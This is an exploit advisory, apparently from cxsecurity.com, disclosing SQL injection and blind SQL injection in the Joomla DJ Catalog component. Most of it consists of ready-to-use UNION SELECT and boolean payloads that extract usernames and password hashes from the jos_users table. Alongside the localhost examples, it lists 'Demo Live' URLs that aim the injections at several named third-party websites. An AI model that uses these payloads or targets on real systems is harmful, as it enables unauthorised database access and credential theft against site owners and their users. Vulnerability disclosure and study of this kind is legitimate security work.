The Joomla DJ Catalog component SQL injection

2009-09-18 / 2009-09-19
Credit: Chip D3 Bi0s
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

----------------------------------------------------------------------------------------- joomla com_djcatalog component SQL/bsql Injection Multiple Vulnerability ----------------------------------------------------------------------------------------- Author : Chip D3 Bi0s Email : chipdebios[alt+64]gmail.com Date : 15 September 2009 Critical Lvl : Moderate Impact : Exposure of sensitive information Where : From Remote --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : DJ-Catalog directory version : Beta Developer : AndrzejH License : GPL type : Non-Commercial Date Added : 9 September 2009 Demo : http://addons.design-joomla.eu/djcat/ http://templates.design-joomla.eu/dj-mobile/ Download : http://www.design-joomla.eu/downloads/download/components/djcatalog-1.5.x/start-download.html Description : Dj catalog is a universal component which meets these expectations, may serve as a directory of products or specific galleries. Thanks to a flexible structure can be easily customized to your individual visual requirements. --------------------------------------------------------------------------- I.SQL injection (id)/(cid) Poc/Exploit: ~~~~~~~~ (id) http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=showItem&id=[Sqlinjection] [Sqlinjection]: null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users (cid) index.php?option=com_djcatalog&view=show&cid=x[Sqlinjection] x = valid cid Sqlinjection] = +and+1=2+union+select+1,password,3,4+from+jos_users Demo Live: ~~~~~~ (id) http://templates.design-joomla.eu/dj-sailing/index.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users http://www.codispasa.net/index.php?option=com_djcatalog&view=showItem&id=null+and+1=0+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12+from+jos_users (cid) http://www.proforte.co.za/index.php?option=com_djcatalog&view=show&cid=5+and+1=0+union+select+1,password,3,4+from+jos_users II.BSQL injection (id)/(cid) Poc/Exploit: ~~~~~~~~ (id) http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=showItem&id=[BSQL] (cid) http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=show&cid=x[BSQL] x = valid cid (blog&cid) http://127.0.0.1/[path]/index.php?option=com_djcatalog&view=show&layout=blog&cid=x[BSQL] x = valid cid Demo Live: ~~~~~~ (id) http://acropolltda.com/index.php?option=com_djcatalog&view=showItem&id=1+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1 http://www.serviproveer.com/index.php/diseno-web/diseno-grafico/components/modules/modules/mod_googlecurrencyconverter/templates/index.php?option=com_djcatalog&view=showItem&id=1+and+substring(@@version,1,1)=5 (cid) http://templates.design-joomla.eu/dj-mobile/index.php?option=com_djcatalog&view=show&cid=1+and+substring(@@version,1,1)=5 http://acropolltda.com/index.php?option=com_djcatalog&view=show&cid=10+and+substring(@@version,1,1)=5 (blog&cid) http://fifthelementorgone.com/index.php?option=com_djcatalog&view=show&layout=blog&cid=1+and+substring(@@version,1,1)=5 http://www.gamerszone.org/index.php?option=com_djcatalog&view=show&layout=blog&cid=10+and+substring(@@version,1,1)=5 +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top